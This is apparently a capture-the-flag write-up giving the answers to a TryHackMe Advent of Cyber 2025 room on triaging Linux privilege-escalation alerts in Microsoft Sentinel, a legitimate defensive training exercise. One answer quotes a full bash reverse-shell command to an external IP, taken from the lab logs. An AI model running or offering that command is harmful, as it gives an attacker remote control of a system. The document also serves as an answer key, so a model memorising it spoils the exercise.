advent-of-cyber-2025

Room Link:
https://tryhackme.com/room/azuresentinel-aoc2025-a7d3h9k0p2

▶️ MyDFIR – Day 10 Video Walkthrough

Official walkthrough for quick onboarding:

🔗 YouTube Link:
https://youtu.be/0VRfOfFRHuU?si=qi2rup7OiDiKCae_


🎄 Advent of Cyber 2025 — Day 10 Write-Up

🧩 SOC Alert Triaging — Tinsel Triage


✅ Challenge Answers


1️⃣ How many entities are affected by the “Linux PrivEsc – Polkit Exploit Attempt” alert?

(screenshots: polkit alert; entities count)

Answer: 10

2️⃣ What is the severity of the “Linux PrivEsc – Sudo Shadow Access” alert?

(screenshot: sudo shadow severity)

Answer: High

3️⃣ How many accounts were added to the sudoers group in the “Linux PrivEsc – User Added to Sudo Group” alert?

(screenshots: sudo group alert; sudo group count)

Answer: 4

🔎 In-Depth Log Analysis with Sentinel


1️⃣ What is the name of the kernel module installed in websrv-01?

(screenshots: kernel module KQL query; kernel module result)

Answer: malicious_mod.ko

2️⃣ What is the unusual command executed within websrv-01 by the ops user?

(screenshot: reverse shell command)

Answer: /bin/bash -i >& /dev/tcp/198.51.100.22/4444 0>&1

3️⃣ What is the source IP address of the first successful SSH login to storage-01?

(screenshot: SSH login source IP)

Answer: 172.16.0.12

4️⃣ What is the external source IP that successfully logged in as root to app-01?

(screenshot: external SSH root IP)

Answer: 203.0.113.45

5️⃣ Aside from the backup user, which user was added to the sudoers group in app-01?

(screenshot: sudoers new user)

Answer: deploy